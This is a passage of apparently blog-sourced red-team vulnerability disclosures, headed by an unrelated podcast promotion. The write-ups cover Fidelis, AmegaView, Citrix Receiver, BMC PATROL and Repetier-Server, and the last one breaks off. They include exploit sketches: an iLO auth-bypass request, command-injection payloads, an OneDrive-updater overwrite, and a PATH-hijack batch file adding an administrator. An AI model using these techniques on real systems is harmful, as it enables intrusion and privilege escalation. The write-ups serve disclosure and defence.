
Red teaming: The fun, and the fundamentals | Cyber Work Live

Learn what it’s like to do good by being bad. The idea of breaking into a company, by hook or by crook, attracts all sorts of would-be secret agents. But what is red teaming really like as a job? What are the parameters, what are the day-to-day realities and, most importantly, what is hands-off in a line of work that bills itself as being beyond rules?

Join a panel of past Cyber Work Podcast guests:
– Amyn Gilani, Chief Growth Officer, Countercraft
– Curtis Brazzell, Managing Security Consultant, GuidePoint Security

Our panel of experts has worked in red teaming from a variety of positions and will answer your questions about getting started, building your skills and avoiding common mistakes.

0:00 - Intro
2:34 - Favorite red team experiences
7:57 - How to begin a cybersecurity career
14:42 - Ethical hacking vs pentesting
18:29 - How to become an ethical hacker
23:32 - Qualities needed for red teaming role
29:20 - Gain hands-on red teaming experience
33:02 - Supplier red team assessments
37:00 - Pentesting variety
46:22 - Becoming a better pentester
52:12 - Red team interview tips
56:00 - Job hunt tips
1:01:18 - Sponsoring an application
1:02:18 - Outro

This episode was recorded live on June 23, 2021. Want to join the next Cyber Work Live and get your career questions answered? See upcoming events here: https://www.infosecinstitute.com/events/

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

About Infosec
Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at infosecinstitute.com.


Operation Eagle Eye

This article is in no way affiliated with, sponsored by, or endorsed by Fidelis Cybersecurity. All graphics are displayed under fair use for the purposes of this article.


Who remembers that movie from about 15 years ago called Eagle Eye? A supercomputer has access to massive amounts of data, you introduce AI, and things go to crap. Reflecting back on that movie, I find myself more interested in what a hacker could actually do with that kind of access than in the AI bit. This post is about what I did when I got that kind of access on a customer red team engagement.

Being a network defender is hard. Constantly trying to balance usability, security, and privacy. Add too much security and users complain they can’t get their job done. Not enough and you open yourself up to being hacked by every script kiddie on the internet. How does user privacy fit in? Well, as a network defender your first grand idea to protect the network against adversaries might be to implement some form of network traffic inspection. This might have worked 20 years ago, but now most network protocols at least support some form of encryption to protect users’ data from prying eyes. If only there was a way to decrypt it, inspect it, and then encrypt it back… Let’s call it break and inspect.

The graphic above was pulled from an NSA article warning about break and inspect and the risks introduced by its usage (I'd be inclined to heed the warning, since the NSA are likely experts on this particular topic). The most obvious risk introduced by break-and-inspect is the device(s) performing the decryption and inspection: compromise of these devices would give an attacker access to all unencrypted traffic traversing the network.

All of this lead-up was meant to describe what I can only assume happened with one of our customers. After years of assessments, I noticed one day that all outbound web traffic now carried a custom CA certificate when visiting websites. This was a somewhat natural progression, as we had been utilizing domain fronting for some time to evade network detection. In response, the network defenders implemented break-and-inspect to identify traffic with conflicting HTTP Host headers. As a red teamer, my almost immediate thought was: what if we could get access to the break-and-inspect device? Being able to sift through all unencrypted web traffic on a large network would be a goldmine. Operation Eagle Eye began…

Enumeration

After no small amount of time, we identified what we believed to be the device(s) responsible for performing the break-and-inspect operation on the network. We found the F5 BIG-IP device listed as the hostname on the CA certificate, a Fidelis Network CommandPost, and several HP iLO management web services in the same subnet. For those who aren't familiar, Fidelis Cybersecurity sells a network appliance suite that can perform traffic inspection and modification. They also just so happen to be listed as an accredited product on the NSA-recommended National Information Assurance Partnership (NIAP) website, so I assume it's super-secure-hackproof 😉

The first order of business was some basic enumeration of the devices in this network segment. The F5s had been updated just after a recent RCE bug was released, so I moved on. The Fidelis CommandPost web application presented a CAS-based login portal at the root URL, as seen below.

After some minimal research on CAS, which appeared to be a rather mature and widely used authentication library, I decided to start brute forcing endpoints on the CommandPost web application with dirsearch. While that was running, I moved on to the HP iLOs to see what we had there.
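For readers who haven't used it, the core of what dirsearch does is simple enough to sketch. The wordlist, base URL, and status handling below are illustrative only (the real tool adds extensions, recursion, and throttling), and the fetch function is injectable so the logic can be run without a live target:

```python
from typing import Callable, Iterable, List, Tuple

def probe_endpoints(base: str, words: Iterable[str],
                    fetch: Callable[[str], int]) -> List[Tuple[str, int]]:
    """Return (url, status) for every candidate path that does not 404."""
    hits = []
    for word in words:
        url = f"{base.rstrip('/')}/{word}"
        status = fetch(url)
        if status != 404:
            hits.append((url, status))
    return hits

# Stubbed responses stand in for a live web server:
responses = {"https://commandpost/query": 200, "https://commandpost/login": 302}
found = probe_endpoints("https://commandpost", ["query", "login", "admin"],
                        lambda url: responses.get(url, 404))
```

In practice you would pass a real HTTP client as `fetch` and a wordlist of a few thousand entries.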

The first thing that jumped out at me about this particular iLO endpoint was that it was HP and the displayed version was below 2.53. This is interesting because a heap-based buffer overflow vulnerability (CVE-2017-12542) discovered a few years back can be exploited to create a new privileged user.

Exploitation – HP iLO (CVE-2017-12542)

While my scanner was still enumerating endpoints on the CommandPost, I went ahead and fired up the iLO exploit to confirm whether or not the target was actually exploitable. Sure enough, I was able to create a new admin user and log in.
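For background, the public proof of concept for CVE-2017-12542 hinges on an oversized Connection header (29 bytes) that corrupts iLO 4's authentication checks; account creation is then a follow-up request to the iLO REST interface. The sketch below only builds the bypass request; the host is a placeholder and this is not a drop-in exploit:

```python
# Sketch of the CVE-2017-12542 bypass primitive: a request whose
# Connection header is exactly 29 bytes long. TARGET is hypothetical.
TARGET = "https://ilo.example.internal"   # placeholder host
BYPASS = "A" * 29                         # the magic 29-byte Connection value

def build_bypass_request(path: str) -> str:
    host = TARGET.split("//", 1)[1]
    return (f"GET {path} HTTP/1.1\r\n"
            f"Host: {host}\r\n"
            f"Connection: {BYPASS}\r\n\r\n")

req = build_bypass_request("/rest/v1/AccountService/Accounts")
```

Real exploitation sends this over TLS and follows up with a POST that adds the new administrative account.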

We now have privileged access to an iLO web management portal for some unknown server. Outside of getting some server statistics and being able to turn the server on and off, what can we actually do that's useful from an attacker's perspective? Well, for one, we can utilize the remote console feature. HP iLOs actually offer two ways to do this: one via Java Web Start from the web interface and one over SSH (which shares credentials with the web interface).

Loading up the remote console via Java for this iLO reveals that this server is actually a Fidelis Direct Sensor appliance. Access to the remote console by itself is not super useful, since you still need credentials to log in to the server. However, when you bring up the Java Web Start remote console you'll notice a menu labeled "Virtual Drives". This menu allows you to remotely mount an ISO of your choosing.

The ability to mount a custom ISO remotely introduces a possible avenue for code execution. If the target server does not have a BIOS password and doesn’t utilize full disk encryption, we should be able to boot to an ISO we supply remotely and gain access to the server’s file system. This technique definitely isn’t subtle as we have to turn off the server, but maybe the system owner won’t notice if the outage is brief 🙂

If you are reading this, there's a good chance you'll be attempting to pull this off mid-operation through some sort of proxy/C2 comms rather than physically sitting at a system on the same network. This makes the choice of ISO critical, since network bandwidth is limited; a live CD image that is as small as possible is ideal. I originally tried a 30 MB TinyCore Linux but eventually landed on the 300 MB Puppy Linux, since it comes with a lot more features out of the box. Once the OS loaded, I mounted the filesystem and confirmed access to critical files.

Since the device had SSH enabled, I decided the easiest mechanism for compromise would be to simply add an SSH public key to the root user's authorized_keys file. The sshd_config also needed to be updated to allow root login and enable public key authentication.
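The edit itself is mundane, but worth being precise about since a malformed sshd_config can lock you out. A rough sketch of the config rewrite (paths and key material are placeholders; on the sensor this would run against the filesystem mounted from the live CD):

```python
# Flip the two sshd_config directives we need, uncommenting them if present
# and appending them if absent. Purely a sketch of the manual edit.
def enable_root_key_auth(config_text: str) -> str:
    wanted = {"PermitRootLogin": "yes", "PubkeyAuthentication": "yes"}
    lines, seen = [], set()
    for line in config_text.splitlines():
        key = line.split()[0].lstrip("#") if line.split() else ""
        if key in wanted:
            lines.append(f"{key} {wanted[key]}")
            seen.add(key)
        else:
            lines.append(line)
    for key in wanted:
        if key not in seen:
            lines.append(f"{key} {wanted[key]}")
    return "\n".join(lines) + "\n"

new_config = enable_root_key_auth("#PermitRootLogin no\nPort 22\n")
# The persistence step is then just:
# open("/mnt/root/.ssh/authorized_keys", "a").write(pubkey + "\n")
```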

Exploitation – Unauthenticated Remote Command Injection (CVE-2021-35047)

After gaining initial access to the Fidelis Direct Sensor appliance via SSH, I began poking around at the services hosted on the device and investigating what other systems it was communicating with. One of the first things I noticed was lots of connections back to the Fidelis CommandPost appliance on port 5556 from an rconfigc process. I also noticed an rconfigd process listening on the sensor; my assumption was that this was some kind of client/server setup between the appliances.

Analyzing the rconfigc/rconfigd binaries revealed they were a custom remote script execution framework. The framework consisted of a simple TLS-based client/server application backed mostly by Perl scripts at varying privilege levels, utilizing hard-coded authentication. I reviewed a couple of these scripts and came across the following code snippet.

If you haven't spotted the bug here, backticks in Perl execute the enclosed string as a shell command. Since there are no checks sanitizing the incoming user variable, additional commands can be executed by simply adding a single quote and a semicolon. Another perk of this particular command is that it runs as root, so we get automatic privilege escalation. I decided to test this remotely against the Fidelis CommandPost to confirm it actually worked.
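The same bug class is easy to reproduce outside of Perl. The snippet below simulates the vulnerable pattern in Python, with an unsanitized value interpolated into a shell command line and a harmless echo standing in for the real command:

```python
import subprocess

def lookup(user: str) -> str:
    # Stand-in for the Perl backtick call, e.g. `some_command '$user'`.
    out = subprocess.run(f"echo 'lookup: {user}'", shell=True,
                         capture_output=True, text=True)
    return out.stdout

# The single quote closes the intended argument, the semicolon chains a new
# command, and the trailing '#' comments out the dangling quote.
payload = "nobody'; echo INJECTED # "
result = lookup(payload)
```

The injected `echo INJECTED` runs as its own shell command, exactly as an attacker-supplied `id` or reverse shell would in the real script.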

Exploitation – Unauthenticated Remote SQL injection (CVE-2021-35048)

Circling back around to the Fidelis CommandPost web application, my dirsearch brute forcing had revealed some interesting endpoints worth investigating. While the majority required authentication, I found two endpoints that accepted XML without requiring it. After trying several different payloads, I managed to get a SQL error returned in the output of one of the requests.

Exploitation – Insecure Credential Storage (CVE-2021-35050)

Using the SQL injection vulnerability identified above, I proceeded to dump the CommandPost database. My goal was to find a way to authenticate to the web application. What I found was a table that stored entries referred to as UIDs. These hex-encoded strings turned out to be the product of a reversible encryption mechanism applied to a string created by concatenating a username and password. Decrypting this value returns credentials that can then be used to log in to the Fidelis web application.
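I won't reproduce the vendor's actual cipher here, but a toy stand-in shows why this design fails. Assume, purely for illustration, a fixed key baked into the product and a simple XOR; any reversible scheme with a static key has the same problem, because recovering the key once decrypts every stored credential:

```python
# Toy stand-in for the reversible "UID" scheme: username and password are
# concatenated, encrypted under a key shipped with the product, and hex
# encoded. The XOR cipher and key are assumptions for illustration only.
FIXED_KEY = b"appliance-static-key"   # hypothetical baked-in key

def encrypt_uid(username: str, password: str) -> str:
    blob = f"{username}:{password}".encode()
    xored = bytes(b ^ FIXED_KEY[i % len(FIXED_KEY)] for i, b in enumerate(blob))
    return xored.hex()

def decrypt_uid(uid_hex: str):
    raw = bytes.fromhex(uid_hex)
    plain = bytes(b ^ FIXED_KEY[i % len(FIXED_KEY)] for i, b in enumerate(raw))
    user, _, pw = plain.decode().partition(":")
    return user, pw

uid = encrypt_uid("admin", "hunter2")
```

A salted one-way hash would have made the dumped table useless to an attacker; reversible storage made it a credential vault.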

Exploitation – Authenticated Remote Command Injection (CVE-2021-35049)

With decrypted root credentials from the database, I authenticated to the web application and began searching for new vulnerabilities in the expanded scope. After a little bit of fuzzing, and help from my previous access, I identified a command injection vulnerability that could be triggered from the web application.

Chaining this vulnerability with each of the previous bugs, I was able to create an exploit that could execute root-level commands across any managed Fidelis device from an unauthenticated CommandPost web session.

The DATA

So here we are: root-level access to a suite of tools that captures and modifies network traffic across an enterprise. It was now time to switch gears and investigate what functionality these devices provide and how it could be abused by an attacker (a post-compromise risk assessment). After navigating through the CommandPost web application endpoints and performing some minimal system enumeration on the devices, I felt like I had a handle on how the systems work together. There are three device types: CommandPost, Sensor, and Collector. Sensors collect, inspect, and modify traffic; Collectors store the data; and the CommandPost provides the web interface for managing the devices.

Given the role of each device, I think the most interesting target for an attacker would have to be a Sensor. If a Sensor can intercept (and possibly modify) traffic in transit, an attacker could leverage it to take control of the network. To confirm this theory, I logged in to a Sensor and began searching for the software and services needed to do this. I started by trying to identify the network interface(s) the data would be traversing. To my surprise, the only interface that showed as "up" was the one bound to the IP address I had logged in to. Time to RTFM.

A picture is worth a thousand words. Based on the figures from the manual shown above, my guess was that the traffic was likely traversing one of the higher-numbered interfaces. Now I just had to figure out why they weren't visible to the root user. After searching through the logs, I found the following clue.

It appears a custom driver is being loaded to manage the interfaces responsible for network traffic monitoring. Since the base OS is CentOS, it must be mounting them in some kind of security container that restricts access to the devices, which is why I couldn't see them. After digging into the driver and some of the processes associated with it, I found that the software uses libpcap and a ring buffer in file-backed memory to intercept the network traffic to be inspected or modified. This means that to access all of the traffic flowing through the device, all we have to do is read the files in the ring buffer and parse the raw network packets. Running the script for just a short time confirmed our theory. We quickly noticed the usual authentication flows for major websites like Microsoft O365 and Gmail, and even stock trading platforms. To put it plainly, compromise of a Fidelis Sensor means an attacker has unfettered access to all of the unencrypted credentials, PII, and sensitive data exiting the monitored network.
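Parsing the packets once you can read the ring buffer files is standard fare. The sketch below assumes plain Ethernet II + IPv4 frames with no VLAN tags and ignores the vendor's ring buffer framing, which would need to be stripped first:

```python
import socket
import struct

def parse_ipv4(frame: bytes):
    """Return (src_ip, dst_ip, protocol) for an Ethernet II IPv4 frame."""
    ethertype = struct.unpack("!H", frame[12:14])[0]
    if ethertype != 0x0800:        # not IPv4
        return None
    proto = frame[23]              # IP protocol field (6 = TCP)
    src = socket.inet_ntoa(frame[26:30])
    dst = socket.inet_ntoa(frame[30:34])
    return src, dst, proto

# Crafted example frame: zeroed MAC addresses + minimal IPv4/TCP header.
eth = b"\x00" * 12 + b"\x08\x00"
ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40, 0, 0, 64, 6, 0,
                 socket.inet_aton("10.0.0.5"), socket.inet_aton("8.8.8.8"))
info = parse_ipv4(eth + ip)
```

From here it is a short step to reassembling TCP streams and carving out HTTP authentication flows.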

Given the impact of our discovery and what was possible post-compromise on these devices, we wrapped up our assessment and immediately reached out to the customer and the vendor to begin the disclosure process.

Vendor Disclosure & Patch

We are happy to report that the disclosure process with the vendor went smoothly and they worked with us to get the issues fixed and patched in a reasonable time frame. Given the severity of these findings, we strongly encourage anyone that has Fidelis Network & Deception appliances to update to the latest version immediately.

MesaLabs AmegaView: Information Disclosure to RCE

Amega Login Page

This article is in no way affiliated with, sponsored by, or endorsed by MesaLabs. All graphics are displayed under fair use for the purposes of this article.

During a recent assessment, multiple vulnerabilities of varied bug types were discovered in the MesaLabs AmegaView Continuous Monitoring System, including command injection (CVE-2021-27447, CVE-2021-27449), improper authentication (CVE-2021-27451), authentication bypass (CVE-2021-27453), and privilege escalation (CVE-2021-27445). In this blog post, we will describe each of the vulnerabilities and how they were discovered.

Recon

While operating, we often encounter devices that make up what we colloquially refer to as the "internet of things," or simply IoT. These are various network-enabled devices outside the usual workstations, servers, switches, routers, and printers. IoT devices are often overlooked by network defenders since they tend to run custom applications and are more difficult to adequately monitor. As red teamers, we pay particular attention to these systems because they can provide reliable persistence on the network and are generally less secure.

The first thing that caught my eye about the AmegaView login page was that it required a passkey for authentication rather than the usual username and password. My initial inclination was to gather more information about the passkey to determine if I could brute force it. So I started where we all do: the web page source.

Amega Log In Page
Login Page Source

The source code revealed a couple of details about the passkey. The "size" and "maxlength" attributes of the password field are set to 10. We would still need more information to realistically brute force the passkey, as 10 characters is too long. However, the source code disclosed two more crucial pieces of information: the existence of the "/www" directory and the "/index.cgi?J=TIME_EDIT" endpoint.

www directory

Navigating to the "/www" directory in a web browser produces a directory listing that includes two Perl files, among others. We also find we can navigate to "/index.cgi?J=TIME_EDIT" without authentication.

The Perl file "amegalib.pl" divulges quite a bit of information. It defines how the passkey is generated and contains a function that executes privileged OS commands, reachable from the "/index.cgi?J=TIME_EDIT" endpoint. It also details the authentication mechanism, which includes two hardcoded cookie values: one for regular users and one for "super" users.

Exploitation

With so many vulns, where do we begin? First, I took the function that generates the passkey and simply ran it. The Perl script produces what is typically a 4-6 digit number loosely based on the current system time. Using this passkey, we can log in to the system as a "super" user. Once logged in, the options available to a "super" user include uploading new firmware, changing certain system options, and running a "ping-out" test.
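To make the impact concrete, here is a hypothetical stand-in for the generator (the real derivation lives in amegalib.pl and differs). The point is that any passkey derived from the clock reduces "brute force" to trying a small window of timestamps around the server's time:

```python
import time

def passkey(t: int) -> str:
    # Invented derivation for illustration: minutes since epoch, truncated.
    return str((t // 60) % 1_000_000)

def candidates(now: int, skew: int = 300):
    """Every passkey value reachable within +/- skew seconds of our clock."""
    return {passkey(t) for t in range(now - skew, now + skew + 1)}

now = int(time.time())
guesses = candidates(now)   # a handful of guesses instead of 10^10
```

Even with five minutes of clock skew in either direction, the attacker only has a dozen or so values to try.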

Super User Logged In

Clicking on the link to the "Ping-Out Test" brings us to a page that seems right out of a CTF. We are presented with an input field that expects an IP address to ping. Entering an IP address, we see that the server runs the ping command 5 times and prints the output. We quickly discover that arbitrary commands can be appended to the IP address using a pipe "|" character, giving us command execution.
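Weaponizing the form is then little more than request building. The parameter names below are assumptions (I'm not reproducing the real form fields), and nothing is actually sent anywhere:

```python
from urllib.parse import urlencode

def ping_injection_url(base: str, cmd: str) -> str:
    payload = f"127.0.0.1| {cmd}"          # the pipe breaks out of the ping line
    query = urlencode({"J": "PING_TEST",   # assumed endpoint parameter
                       "ip": payload})     # assumed field name
    return f"{base}/index.cgi?{query}"

url = ping_injection_url("http://amega.example", "id")
```

Swapping `id` for a netcat one-liner is what turns this into the reverse shell described below.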

With command execution proven, the next step was to spawn a netcat reverse shell and begin enumerating the file system in search of more vulnerabilities.

Privilege Escalation

Having discovered a way to execute commands as an unprivileged user, the next goal was to find a way to escalate to root on the underlying system. We noticed a promising function in the "amegalib.pl" file called "run_SUcommand". Since the current user had the ability to write files to the web root, I simply created a CGI file that called the "run_SUcommand" function from "amegalib.pl". After confirming that worked, I used netcat again to spawn a shell as root. Looking through the source code, I found this function is also reachable by an authenticated user from the previously mentioned "/index.cgi?J=TIME_EDIT" endpoint. The vulnerable code is shown below.

The “set_datetime” function displayed above concatenates data supplied by the user and then passes it to the “run_SUcommand” function. Arbitrary code execution as the root user can be achieved by sending a specially crafted time update request with the desired shell commands as shown below.

Wrap Up

This product will reach its end of life at the end of December 2021.  MesaLabs has stated that they do not plan to release a patch, so system owners beware!

Hacking Citrix Storefront Users

This article is in no way affiliated with, sponsored by, or endorsed by Citrix Systems, Inc. All graphics are displayed under fair use for the purposes of this article.


With the substantial shift from traditional work environments to remote/telework capable infrastructures due to COVID-19, products like Citrix Storefront have seen a significant boost in deployment and usage. Due to this recent shift, we thought we’d present a subtle configuration point in Citrix Receiver that can be exploited for lateral movement across disjoint networks. More plainly, this (mis)configuration can allow an attacker that has compromised the virtual Citrix Storefront environment to compromise the systems of the users that connect to it using Citrix Receiver.

Oopsie

For those who aren't familiar with Citrix Storefront, it is made up of multiple components and is often associated with other Citrix products like Citrix Receiver/Workspace, XenApp, and XenDesktop. An oversimplification of what it provides: the ability for users to remotely access shared virtual machines or virtual applications.

To remote into these virtual environments, a user has to download and install Citrix Workspace (formerly Receiver). Upon install, the user is greeted with the following popup, and the choice is stored in the registry for that user.

What we've found is that, more often than not, both end users and group-policy-managed systems have this configuration set to "Permit All Access", likely because it isn't very clear what you are permitting all access to, or whether it is necessary for proper usage of the application. I for one can admit to having clicked "Permit All Access" before researching what this setting actually means.

So what exactly does this setting do? It mounts the current user's drives as a share on the remote Citrix virtual machine. If the user selects "Permit All Access", it enables the movement of files from the remote system to the user's shared drive.

OK, so a user can copy files from the remote system; why is this a security issue? Because there is now no security boundary between the user's system and the remote Citrix environment. If the remote Citrix virtual machine is compromised, an attacker can freely write files to the connecting user's shared drive without authentication.

Giving an attacker the ability to write files on your computer doesn't sound that bad, right? Especially if you are a low-privileged user on the system. What could they possibly do with that? They could overwrite binaries that are executed by the user or the operating system. A simple example of trivial code execution on Windows 10 is overwriting the OneDriveStandaloneUpdater binary located in the user's AppData directory. This binary is called daily by a scheduled task.
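From the compromised Citrix VM, the client drive is just a UNC path, so the overwrite is a file copy. The \\Client\C$ form and the username below are assumptions for illustration; the updater path is the standard per-user OneDrive location:

```python
import ntpath

def updater_path(client_drive: str, user: str) -> str:
    """Path to the user's OneDrive updater, reached over the mapped client drive."""
    return ntpath.join(client_drive, "Users", user, "AppData", "Local",
                       "Microsoft", "OneDrive", "OneDriveStandaloneUpdater.exe")

target = updater_path(r"\\Client\C$", "victim")
# shutil.copy("payload.exe", target)   # would execute at the next daily update run
```

Writable user-context binaries that are launched on a schedule are plentiful; the OneDrive updater is just a convenient, reliably-present example.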

Recommendations

Use the principle of least privilege when using Citrix Workspace to remote into a shared Citrix virtual environment. Set the file security permissions for Citrix Workspace to "No Access" by default and only change them temporarily when it is necessary to copy files to or from the remote virtual environment. The following Citrix article explains how to change these settings in the registry: https://support.citrix.com/article/CTX133565

BMC Patrol Agent – Domain User to Domain Admin – Part 2

Securifera is in no way affiliated with, sponsored by, or endorsed by BMC. All graphics produced are in no way associated with BMC or its products and were created solely for this blog post. All uses of the terms BMC, PATROL, and any other BMC product trademarks are intended only for identification purposes and are to be considered fair use throughout this commentary. Securifera offers no products or services that compete with the BMC products referenced.

Recap

A little over two years ago I wrote a blog post about a red team engagement I participated in for a customer that utilized BMC PATROL for remote administration on the network. The assessment culminated with our team obtaining domain admin privileges on the network by exploiting a critical vulnerability in the BMC PATROL software. After coordinating with the vendor, we provided several mitigations to the customer. The vendor characterized the issue as a misconfiguration, and guidance was given on how to better lock down the software. Two years later we executed a retest for the customer, and this blog post describes what we found.

From a red teamer's perspective, the BMC PATROL software can be described as a remote administration tool. The vulnerability discovered in the previous assessment allowed an unprivileged domain user to execute commands on any Windows PATROL client as SYSTEM. If that doesn't seem bad enough, it should be noted that this software was running on each of the customer's domain controllers.

The proposed mitigation to the vulnerability was a couple of configuration changes that ensured the commands were executed on the client systems under the context of the authenticated user.

A specific PATROL Agent configuration parameter (/AgentSetup/pemCommands_policy = “U” ) can be enabled that ensures the PATROL Agent executes the command with (or using) the PATROL CLI connected user.

reference: https://docs.bmc.com/docs/display/pia100/Setting+the+default+account+for+PEM+commands.

Restricted mode. Only users from Administrators group can connect and perform operations (“/AgentSetup/accessControlList” = “:Administrators/*/CDOPSR”):

reference: https://docs.bmc.com/docs/PATROLAgent/113/security-guidelines-for-the-patrol-agent-766670159.html

Unprivileged Remote Command Execution

Given the results from our previous assessment, as soon as we secured a domain credential I decided to test PATROL again. I started up the PatrolCli application and tried to send a command to test whether it would be executed as my user or as a privileged one. (In the screenshot, the IP shows loopback because I was sending traffic through an SSH port forward.)

The output suggested the customer had indeed implemented the mitigations suggested by the vendor. The command was no longer executed with escalated privileges on the target, but as the authenticated user. The next thing to verify was whether the domain's authorization checks were being enforced. For a little background: in most Windows Active Directory implementations, users are added to specific groups that define what permissions they have across the domain. Often these permissions specify which systems a user can log in to or execute commands on. This domain was no different, in that very stringent access control lists were defined for each user.

A simple way to test whether authorization checks were being performed properly was to attempt to log in or execute commands on a remote Windows system with a given user over RDP, SMB, or WMI, then perform the same test using BMC PATROL and see if the results matched. To add further confidence to my theory, I decided to test against the most locked-down system on the domain: the domain controller. Minimal reconnaissance showed the DC only allowed a small group of users remote access and required an RSA token for 2FA. Not surprisingly, I was able to execute commands directly on the domain controller with an unprivileged user that did not have permission to log in or remotely execute on the system via standard Windows methods.

As this result wasn't largely unexpected based on my previous research, the next question to answer was whether I could do anything meaningful on a domain controller as an unprivileged user with no defined permissions on the system. The first thing that stood out to me was the absence of a writable user folder, since PATROL had undermined the OS's external access permissions. This meant my file system permissions would be bound to those set for the "Users", "Authenticated Users", and "Everyone" groups. To make things just a little bit harder, I discovered that a policy was in place that only allowed the execution of trusted signed executables.

Escalation of Privilege

With unprivileged remote command execution using PATROL, the next logical step was to try to escalate privileges on the remote system. As a red teamer, the need to escalate an unprivileged user to SYSTEM comes up pretty often. It is also quite surprising how common it is to find privilege escalation vulnerabilities in Windows services and scheduled tasks. I spent a fair amount of time hunting for these types of bugs following research by James Forshaw and others several years back.

The first thing I usually check when looking for Windows privilege escalation bugs is whether there are any writable folders in the current PATH environment variable. For such an old and well-known misconfiguration, I come across this ALL THE TIME. A writable folder in the PATH is not a guaranteed win; it is one of two requirements for escalating privileges. The second is finding a privileged process that insecurely loads a DLL or executes a binary. By insecurely, I mean without specifying the absolute path to the resource. When this happens, Windows attempts to locate the binary by searching the folders listed in the PATH variable. If an attacker has the ability to write to a folder in the PATH, they can drop a malicious binary that will be loaded or executed by the privileged process, thus escalating privileges.

Listing the environment variables with "set" on the target reveals that it does indeed have a custom folder at the root of the drive in the PATH. At a glance, there is already a good chance it is writable, because by default any new folder created at the root of the drive is writable due to permission inheritance. A quick test confirms it.
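This check is easy to script if you're modeling the target. os.access is a reasonable first pass, though Windows ACLs can make it optimistic, so confirm by actually writing a file:

```python
import os

def writable_path_dirs(path_value: str):
    """Return the PATH entries that exist and appear writable."""
    return [d for d in path_value.split(os.pathsep)
            if d and os.path.isdir(d) and os.access(d, os.W_OK)]

# Example against the current process environment:
hits = writable_path_dirs(os.environ.get("PATH", ""))
```

On the target, any entry this returns ahead of a system directory is a candidate for the hijack described next.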

With the first requirement for my privilege escalation confirmed, I moved on to searching for a hijackable DLL or binary. The most common technique is to simply open Sysinternals Process Monitor and begin restarting all the services and scheduled tasks on the system. This isn't really practical in our situation, since one already has to be in a privileged context to restart these processes, and you need an interactive session.

What we can do is attempt to model the target system in a test environment and perform this technique there, in hopes that any vulnerabilities will map to the target. The obvious first privileged service to investigate is BMC PATROL. After loading up Process Monitor and restarting the PatrolAgent service, I added a filter to look for "NO SUCH FILE" and "NAME NOT FOUND" results. Unfortunately, I didn't see any relative loading of DLLs. I did see something else interesting though.

What we're seeing here is the PatrolAgent service executing "cmd /c bootime" whenever it is started. Since an absolute path is not specified, the operating system attempts to locate the application using the PATH. An added bonus is that the developers didn't even bother to add an extension, so we aren't limited to an executable (this will be important later). For this to be successful, our writable folder has to be listed earlier in the search order than the actual path of the real bootime binary. Fortunately for me, the target system lists the writable folder first in the PATH search order. To confirm I could actually get execution, I dropped a "boottime.bat" file in my test environment and watched as it was successfully selected from a folder earlier in the PATH search order.

So that's it, right? Time to start raining shells all over the network? Not quite yet. As most are probably aware, an unprivileged user doesn't typically have the permissions necessary to restart a service. This means the most certain way to get execution is each time the system reboots. Unfortunately, on a server that could take weeks or longer, especially for a domain controller. Another possibility could be to try to crash the service and hope it is configured to restart. Before I capitulated to these ideas, I decided to research whether the application, in all its complex robustness, actually provided this feature in some way. A little googling later, I came across the following link. Supposedly I could just run the following command from an adjacent system with PATROL and the remote service would restart.

pconfig +RESTART -host

Sure enough, it worked. I didn't take the time to reverse engineer what other possibilities existed with this new "pconfig" application that apparently had the ability to perform at least some privileged operations without authentication. I'll leave that for PART 3 if the opportunity arises.

Combining all of this together, I now had all of the necessary pieces to once again achieve domain admin with only a low-privileged domain user, using BMC PATROL. I wrote "net localgroup Administrators /add" to C:\Scripts\bootime.bat using PATROL and then executed "pconfig +RESTART -host" to restart the service and add my user to the local Administrators group. I chose to go with "bootime.bat" rather than "bootime.exe" because it provided me with privileged command execution while also evading the execution policy that required trusted, signed executables. It was almost too good to be true.

Following the assessment, I reached out to BMC to responsibly disclose the binary hijack in the PatrolAgent service. They were quick to reply and issue a patch. The vulnerability is being tracked as CVE-2020-35593.

Recommendations

The main lesson to be learned from this example is to always be cognizant of the security implications each piece of software introduces into your network. In this instance, the customer had invested significant time and resources to lock down their network. It had stringent access controls, group policies, and multiple two-factor authentication mechanisms (smart cards and RSA tokens). Unfortunately, they also installed a remote administration suite that subverted almost all of these measures. While IT professionals have a myriad of third-party remote administration tools at their disposal, it is often much safer to just use the built-in mechanisms the operating system supports for remote administration. At least that way there is a higher probability the tooling was designed to properly utilize the authentication and authorization systems already in place.

A 3D Printed Shell


With 3D printers getting a lot of attention during the COVID-19 pandemic, I thought I'd share a post about an interesting handful of bugs I discovered last year. The bugs were found in a piece of software that is used for remotely managing 3D printers. Chaining these vulnerabilities together enabled me to remotely exploit the Windows server hosting the software with SYSTEM level privileges. Let me introduce "Repetier-Server", the remote 3D printer management software.

Exploration

Like many of my past targets, I came across this software while performing a network penetration test for a customer. I found the page above while reviewing screenshots of all of the web servers in scope of the assessment. Having never encountered this software before, I loaded it up in my browser and started checking it out. After exploring some of the application's features, I googled the application to see if I could find some documentation, or better, download a copy of the software to install. I was happy to find that not only could I download a free version of the software, but they also provided a nice user manual that detailed all of the features.

In scenarios where I can obtain the software, my approach to vulnerability discovery is slightly different than for the typical black-box web application. Since I had a local copy of the software, I could disassemble/decompile it and search for vulnerabilities directly. With time constraints being a concern, I started with the low-hanging fruit and worked toward the more complex vulnerabilities. I reviewed the documentation looking for mechanisms where the software might execute commands against the operating system. Oftentimes, simple web applications are nothing more than a web-based wrapper around a set of shell commands.

I discovered the following blurb in the “Advanced Setup” section of the documentation that describes how a user can define “external” commands that can be executed by the web application.

As I had hoped, the application already had the ability to execute system commands; I just had to find a way to abuse it. The documentation provided the syntax and XML structure for the external command config file.

The video below demonstrates the steps necessary to define an external command, load it into the application, and execute it. These steps would become requirements for the exploit primitives I needed to discover in order to achieve remote code execution.

Discovery

Now that I had a feature to target, external commands, I needed to identify what the technical requirements were to reach that function. The first and primary goal was to find a way to write a file to disk from the web application. The second goal was ensuring I had sufficient control over the content of the file to pass any XML parsing checks. The remaining goals were nice to haves: a way to trigger a reboot/service restart, ability to read external command output, and file system navigation for debugging.

I started up Sysinternals Process Monitor to help me identify the different ways I could induce a file write from the web application. I then added a filter to only display file write operations by the RepetierServer.exe process.

Bug 1 – File Upload & Download – Arbitrary Content – Constant PATH

